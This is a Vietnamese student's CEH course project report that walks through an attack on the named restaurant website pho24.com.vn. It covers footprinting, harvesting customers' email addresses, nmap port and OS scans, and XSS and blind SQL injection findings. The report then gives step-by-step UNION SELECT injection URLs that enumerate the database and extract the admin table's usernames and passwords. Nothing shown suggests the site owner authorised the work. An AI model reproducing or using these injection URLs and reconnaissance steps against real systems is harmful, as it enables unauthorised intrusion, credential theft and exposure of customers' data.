Khai thác lỗi bảo mật của trang web pho24.com.vn
Trang 1Đồ án hết môn lớp CEH Khai giảng ngày 5/4/2012 – Tối 3,5,7
SVTT: Đặng Lê Nam
Trang 2Khai thác lỗi bảo mật của trang web pho24.com.vn
MỤC LỤC
Chương 1: Tìm hiểu về đặc điểm và tính chất của trang web victim 3
I Footprinting: 3
1 Tìm hiểu về domain pho24.com.vn 3
2 Tìm hiểu về các domain sử dụng chung 1 hosting với pho24.com.vn 5
3 Tìm hiểu về con đường dẫn hacker tấn công máy victim 5
4 Khai thác email khách hàng và email user sử dụng web victim 7
II Scanning: 7
1 Tìm hiểu về các port mở trên máy chủ pho24.com.vn 7
2 Tìm hiểu về thông tin hệ điều hành sử dụng của máy chủ web 8
3 Tìm hiểu về webservice đang hoạt động trên máy chủ web 9
III Tìm hiểu về lỗi Web Application trên pho24.com.vn 9
1 Lỗi Blind SQL Injection 9
2 Lỗi XSS 11
Chương 2: Tấn công và khai thác trang web victim bằng SQL Injection 12
I Tấn công và khai thác trang web bằng thủ công: 12
1 Trang web truy cập bình thường với pid =35 12
2 Trang web bị lỗi với pid =35’ 12
3 Tìm số column để tiến hành khai thác 13
4 Tìm các column gây ra lỗi: 14
5 Tìm tên database (Cơ sỡ dữ liệu) của website 15
6 Tìm tên các bảng trong cơ sỡ dữ liệu 15
7 Tìm các cột (trường dữ liệu) của bảng admin 16
8 Tìm username và password của người quản trị 16
II Tấn công và khai thác trang web victim bằng công cụ Havij 18
Trang 3Chương 1: Tìm hiểu về đặc điểm và tính chất của trang web victim
I Footprinting:
1 Tìm hiểu về domain pho24.com.vn
- Ở đây ta nhận thấy pho24.com.vn sử dụng domain vn vì vậy ta vào vnnic.vn để truy vết sở hữu tên miền này
Trang 4Khai thác lỗi bảo mật của trang web pho24.com.vn
Ta thấy khi ta kết nối với dns server của pho24.com.vn (bằng lệnh ls –d pho24.com.vn) thì không thể truy xuất các zone của các máy đặt trên dns đó về được vì vậy ta chỉ có thể dò tìm các máy này trên google hoặc mò giống máy ftp được như trên (ftp.pho24.com.vn) mà thôi
Trang 5 Ta thấy mail server và ftp server cùng nằm trên 1 địa chỉ 221.132.37.135 là máy ns.pho24.com.vn và cũng là máy ns1.lisdns.net của nhà cung cấp FPT, đặc biệt là máy này khác máy chủ làm web 221.132.37.133
2 Tìm hiểu về các domain sử dụng chung 1 hosting với pho24.com.vn
Ta thấy có 33 domains sử dụng chung hosting với pho24.com.vn vậy
ta kết luận pho24.com.vn sử dụng shared host
3 Tìm hiểu về con đường dẫn hacker tấn công máy victim
- Sử dụng công cụ trace route trên internet ta thấy qua 15 hops count hacker (206.123.64.42) mới đến được máy victim (221.132.37.133)
Trang 6Khai thác lỗi bảo mật của trang web pho24.com.vn
- Sử dụng phần mềm neotrace để thấy con đường đi đến máy victim rõ ràng hơn
Trang 74 Khai thác email khách hàng và email user sử dụng web victim
- Sử dụng chương trình 1st Email Address Spider 2006 giúp ta tìm thông tin email của khách hàng và user sử dụng trang web pho24.com.vn một cách nhanh chóng
II Scanning:
1 Tìm hiểu về các port mở trên máy chủ pho24.com.vn
Nmap –sS –PN pho24.com.vn
Trang 8Khai thác lỗi bảo mật của trang web pho24.com.vn
2 Tìm hiểu về thông tin hệ điều hành sử dụng của máy chủ web
Nmap –0 – p 80 –PN pho24.com.vn
Trang 93 Tìm hiểu về webservice đang hoạt động trên máy chủ web
III Tìm hiểu về lỗi Web Application trên pho24.com.vn
1 Lỗi Blind SQL Injection
- Ta thấy có 4 tham số để khai thác lỗi sql injection là city, district, php_id, pid
Nmap –sV –p 80 –PN pho24.com.vn
Trang 10Khai thác lỗi bảo mật của trang web pho24.com.vn
- Ta sử dung phần mềm acunetix Web Vulnerability Scanner vừa có thể quét lỗi và test lỗi trực tiếp trên phần mềm
- Ví dụ: ở đây ta khai thác lỗi Blind SQL injection ở tham số city
Trang 112 Lỗi XSS
- Ta thấy lỗi XSS ở tham số language
- Ta có thể chèn script ngay trên trang web
Trang 12Khai thác lỗi bảo mật của trang web pho24.com.vn
Chương 2: Tấn công và khai thác trang web victim bằng SQL Injection
I Tấn công và khai thác trang web bằng thủ công:
1 Trang web truy cập bình thường với pid =35
2 Trang web bị lỗi với pid =35’
- Lỗi inject tại biến pid
- Trang web không thấy được nội dung
Trang 133 Tìm số column để tiến hành khai thác
- Sử dụng toán tử order by { số column tăng dần ) để đoán column
- Ta thấy column 14 thì trang web bắt đầu không thấy nội dung nữa
- Giảm column còn 13 thì trang web trờ lại bình thường
Giá trị columns chúng ta sẽ khai thác là 13
Trang 14Khai thác lỗi bảo mật của trang web pho24.com.vn
4 Tìm các column gây ra lỗi:
- Cú pháp câu lệnh:
http://pho24.com.vn/htmls/index.php?f=menu_a_details.php&cur=2&pho=1&pho_id=2&pid=35%2 0union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13
Trang 155 Tìm tên database (Cơ sỡ dữ liệu) của website
- Cú pháp câu lệnh:
6 Tìm tên các bảng trong cơ sỡ dữ liệu
- Cú pháp câu lệnh:
http://pho24.com.vn/htmls/index.php?f=menu_a_details.php&cur=2&pho=1&pho_id=2&pid=-35 UNION SELECT 1,2,3,4,5,6,7,8,9,group_concat(schema_name),11,12,13 from
information_schema.schemata
Trang 16Khai thác lỗi bảo mật của trang web pho24.com.vn
7 Tìm các cột (trường dữ liệu) của bảng admin
- Cú pháp câu lệnh:
8 Tìm username và password của người quản trị
- Cú pháp câu lệnh:
http://pho24.com.vn/htmls/index.php?f=menu_a_details.php&cur=2&pho=1&pho_id=2&pid=-35
UNION SELECT 1,2,3,4,5,6,7,8,9,group_concat(column_name),11,12,13 from
information_schema.columns where table_name=0x61646d696e
Trang 17http://pho24.com.vn/htmls/index.php?f=menu_a_details.php&cur=2&pho=1&pho_id=2&pid=-35 UNION SELECT 1,2,3,4,5,6,7,8,9,group_concat(username),11,group_concat(password),13 from
admin
Trang 18Khai thác lỗi bảo mật của trang web pho24.com.vn
II Tấn công và khai thác trang web victim bằng công cụ Havij